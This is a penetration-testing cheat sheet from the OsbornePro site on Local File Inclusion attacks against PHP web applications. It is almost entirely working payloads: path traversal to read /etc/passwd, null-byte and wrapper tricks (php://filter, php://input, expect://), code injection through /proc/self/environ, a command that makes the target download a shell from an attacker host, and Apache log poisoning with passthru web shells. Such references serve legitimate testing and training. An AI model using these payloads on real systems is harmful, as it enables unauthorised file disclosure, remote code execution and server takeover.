LFI File Inclusions - OsbornePro

Local File Inclusion Methods

# Null Byte Technique
http://127.0.0.1/lfi/example.php?page=../../../../../../etc/passwd%00
# This only works in versions below php 5.3
http://127.0.0.1/lfi/example.php?page=../../../../../../etc/passwd?
# Question mark also may have the same results

# Bypassing php-execution
curl http://127.0.0.1/lfi/example.php?page=php://filter/convert.base64-encode/resource=example -O savefile.php
# The above can be used to read PHP files which are normally only executed. Read the returned output with
base64 -d savefile.php

# PHP Wrapper expect:// LFI
http://127.0.0.1/lfi/example.php?page=expect://ls
# If the above URL returns the below result the expect method is disabled
Warning: include(): Unable to find the wrapper "expect" - did you forget to enable it when you
configured PHP? in /var/www/html/lfi/example.php on line #

# PHP Wrapper php://file
http://127.0.0.1/lfi/example.php?page=php://input
# If the above method is successful attempt a command injection using POST
curl 127.0.0.1/lfi/example.php?page=php://input -d '<? system("uname -a");?>'

# PHP Wrapper php://filter
http://127.0.0.1/lfi/example.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd

# /proc/self/environ LFI Method
# If the above is successful and you can access /proc/self/environ you have command injection
curl http://127.0.0.1/lfi/example.php?page=/proc/self/environ&cmd=ls 
curl http://127.0.0.1/lfi/example.php?page=/proc/self/environ -A '<?system("wget http://your-machine/shell.txt -O shell.php");?>'
# The above command will be executed, downloading the txt shell from http://your-machine/shell.txt and will save it as shell.php on the target machine. 
# This can be attempted using exec() or system() in case one or the other is disabled

# /proc/self/fd/ LFI Method
# With this method it is possible to introduce code into the proc log files by injecting PHP code into the referer value
You will need to Brute Force the directory structure of /proc/self/fd/ using FuzzDB’s LFI-FD-Check.txt list of likely proc files. Monitor the returned page sizes.
curl -e '<? system("uname -a");?>' http://127.0.0.1/lfi/example.php?page=/proc/self/environ

# Log File Poisoning
# Insert php-code into the Apache access.log file with nc or telnet
nc 127.0.0.1 80
GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1
Host: 127.0.0.1
Connection: close

# Insert php-code into the Apache error.log file with nc or telnet
nc 127.0.0.1 80
GET /AAAAAA<?php passthru($_GET['cmd']); ?> HTTP/1.1
Host: 127.0.0.1
Connection: close

# Insert php-code into the referer parameter.
GET / HTTP/1.1
Referer: <? passthru($_GET[cmd]) ?>
Host: 127.0.0.1
Connection: close

# Execute code using your log poisoned entries
http://127.0.0.1/lfi/example.php?page=../../../../../var/log/apache2/access.log&cmd=id
http://127.0.0.1/lfi/example.php?page=../../../../../var/log/apache2/error.log&cmd=id

Local File Inclusion

Local File Inclusion Methods

Site Links

Contact Info

Local File Inclusion

Local File Inclusion Methods

Site Links

Contact Info

Subscribe to OsbornePro TV